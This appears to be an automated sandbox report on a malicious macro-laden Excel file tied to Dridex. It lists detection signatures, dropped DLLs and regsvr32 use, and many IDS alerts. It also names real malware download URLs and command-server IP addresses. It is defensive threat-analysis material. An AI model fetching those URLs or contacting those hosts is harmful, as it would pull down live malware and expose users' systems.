Analysis Report printouts of outstanding as of 01_20_2021.xlsm

Overview

General Information

Sample Name: printouts of outstanding as of 01_20_2021.xlsm
Analysis ID: 342170
MD5: 28e9c78dcffb4a80c7bcfcd818791940
SHA1: 0f239865c9e2bdd64d2017c7d26cac19dc7d3cde
SHA256: 09cceb619174c99d026734f860f26cda0107af31b9153a9f7d6613c86fd57772

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://cms.ivpr.org/by9zwa7p1.zip Avira URL Cloud: Label: malware
Source: http://monitrade.net/h79fwesfe.rar Avira URL Cloud: Label: malware
Source: http://salaodigitalautomovel.pt.deve.pt/d8ms3mljy.zip Avira URL Cloud: Label: malware
Source: http://laureys.be/uzssv27.rar Avira URL Cloud: Label: malware
Source: http://artec.com.tr/xkpffwn.zip Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: printouts of outstanding as of 01_20_2021.xlsm Virustotal: Detection: 24% Perma Link
Source: printouts of outstanding as of 01_20_2021.xlsm ReversingLabs: Detection: 11%

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49186 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49187 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49191 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49192 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49199 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49204 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49209 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49212 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49216 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49225 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49232 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49238 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49241 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49244 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49246 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49249 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49256 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49257 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49260 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49271 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49279 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49283 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49293 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49286 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49305 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49309 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll Jump to behavior
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: h79fwesfe[1].rar.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: monitrade.net
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 194.225.58.214:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.185.147.185:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49171
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49170
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49174
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49177
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49177
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49179
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49180
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49180
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49182
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49183
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49184
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49186
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49187
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49190
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49190
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49191
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49192
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49193
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49194
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49196
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49199
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49200
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49202
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49202
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49203
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49204
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49207
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49208
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49208
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49209
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49206
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49206
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49210
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49212
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49213
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49213
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49215
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49216
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49219
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49220
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49220
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49222
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49225
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49223
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49223
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49224
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49227
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49228
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49229
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49229
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49231
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49232
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49235
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49238
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49241
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49239
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49239
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49240
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49243
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49244
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49245
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49245
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49246
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49248
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49249
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49251
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49251
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49252
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49253
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49254
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49254
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49256
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49257
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49260
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49259
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49264
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49263
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49265
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49265
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49267
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49267
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49266
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49269
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49270
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49271
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49273
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49273
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49275
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49276
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49279
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49280
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49280
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49281
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49281
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49283
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49282
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49288
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49287
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49290
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49290
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49292
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49293
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49294
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49296
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49296
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49286
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49297
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49298
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49299
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49299
